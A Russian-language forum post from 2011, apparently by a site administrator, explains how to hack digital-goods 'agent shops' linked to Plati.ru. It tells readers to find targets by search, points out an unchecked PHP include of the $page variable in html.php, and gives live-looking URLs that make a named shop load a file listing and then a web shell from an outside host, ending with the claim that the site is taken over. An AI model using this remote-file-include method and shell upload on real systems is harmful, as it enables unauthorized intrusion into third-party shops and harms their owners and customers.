SEO sprint - максимальная раскрутка сайтов!

[ Новые сообщения · Корсары · Конституция гавани · Поиск · RSS ]
  • Страница 1 из 1
  • 1
Модератор форума: Lubber, Растеадор, Andrey  
Форум » Общественная жизнь » Таверна » Уязвимости в агентских магазнах Plati.ru
Уязвимости в агентских магазнах Plati.ru
РастеадорДата: Среда, 02.02.2011, 19:41 | Сообщение # 1
Король пиратов
Права: Администратор
Письма: 578
Подарки: 6
Рейтинг: 520
Место: В открытом море
Медали
За создание сайта Уважаемый пользователь За 100 Сообщений За 200 Сообщений За 300 Сообщений За 200 Сообщений Администратор Новый корсар Освоившийся
Взлом агентского магазина цифровых товаров от Plati.ru.
Для начала ищем этот магазин идем на http://www.ya.ru и набираем агентский магазин
Выдаст кучу сайтов которые так и желают открыть для вас двери о которых я вам сейчас расскажу.
Большинство этих магазинов в корне сайта имеют вид:

[?
$page="index_.php";
include("html.php");
?]

Это меня сразу заинтересовало, т.к. можно передать скрипту html.php свою переменную $page..

Далее смотрим скрипт html.php:
Там без всяких проверок переменной $page идел следующий код:

[?
include($page);
?]

Не трудно догадаться, что здесь есть уязвимость на инклуд.
Далее делаем просто:
Дерем магазин например:
http://sherys.ru/html.php?page=http://www.zarabotak.com/1.txt
Теперь мы видим список файлов в директории, и можем немного полазить по серверу.
Чтобы залить шелл пользуемся вот этой ссылкой:
http://sherys.ru/html.php?page=http://www.zarabotak.com/shell.txt
Вот и все сайт под нашим контролем


 
Форум » Общественная жизнь » Таверна » Уязвимости в агентских магазнах Plati.ru
  • Страница 1 из 1
  • 1
Поиск:

Copyright Растеадор & Lubber © 2009-2018 Seven Seas Team